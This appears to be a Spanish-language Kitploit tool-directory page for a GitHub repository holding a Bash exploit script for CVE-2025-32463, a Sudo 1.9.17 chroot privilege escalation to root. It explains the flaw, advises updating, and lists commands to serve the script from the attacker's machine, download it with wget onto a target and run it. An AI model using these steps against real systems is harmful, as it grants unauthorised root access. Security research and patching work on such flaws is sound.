Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32463 — Script de exploit en Bash para CVE-2025-32463, una vulnerabilidad de escalada local de privilegios en Sudo 1.9.17 mediante la opción chroot, que permite acceso root en sistemas afectados. | Kitploit
Herramientas/GitHubGitHub/justjoeyking/cve-2025-32463
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubjustjoeyking/cve-2025-32463

CVE-2025-32463

Script de exploit en Bash para CVE-2025-32463, una vulnerabilidad de escalada local de privilegios en Sudo 1.9.17 mediante la opción chroot, que permite acceso root en sistemas afectados.

Ver Repositorio
2hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

La versión 1.9.17 de Sudo tiene una vulnerabilidad crítica (CVE-2025-32463) que permite a usuarios locales obtener acceso root explotando la opción chroot, lo que puede conllevar graves riesgos de seguridad. Se recomienda a los usuarios actualizar a la versión 1.9.17p1 o posterior para mitigar este problema.

Resumen de la vulnerabilidad de Sudo 1.9.17:-

La vulnerabilidad en la versión 1.9.17 de Sudo, identificada como CVE-2025-32463, es una falla crítica que permite a usuarios locales obtener acceso root. Este problema surge de un cambio en la forma en que Sudo maneja la opción --chroot (-R), que está diseñada para aislar procesos cambiando su directorio raíz.

Cómo funciona la vulnerabilidad:-

Problema de resolución de rutas: En las versiones 1.9.14 a 1.9.17, Sudo evalúa la opción --chroot antes de verificar los permisos del usuario. Esto permite a los atacantes controlar el entorno y cargar bibliotecas maliciosas.

Pasos de explotación:

Un atacante crea un archivo nsswitch.conf malicioso en un directorio que controla. Ejecuta Sudo con la opción -R, lo que hace que Sudo cargue la configuración y bibliotecas del atacante, otorgando acceso root.

He creado un script bash "cwoot.sh" que, tras su ejecución, elevará directamente al usuario root.

Haz lo siguiente:

Descargar el script del repositorio: git clone https://github.com/justjoeyking/CVE-2025-32463.git

En la máquina propia: python3 -m http.server 8080

En la máquina objetivo: wget http://<own_IP_address>:8080/cwoot.sh

En la máquina objetivo: chmod 755 cwoot.sh

Ejecutar script en la máquina objetivo: ./cwoot.sh

Descargar herramienta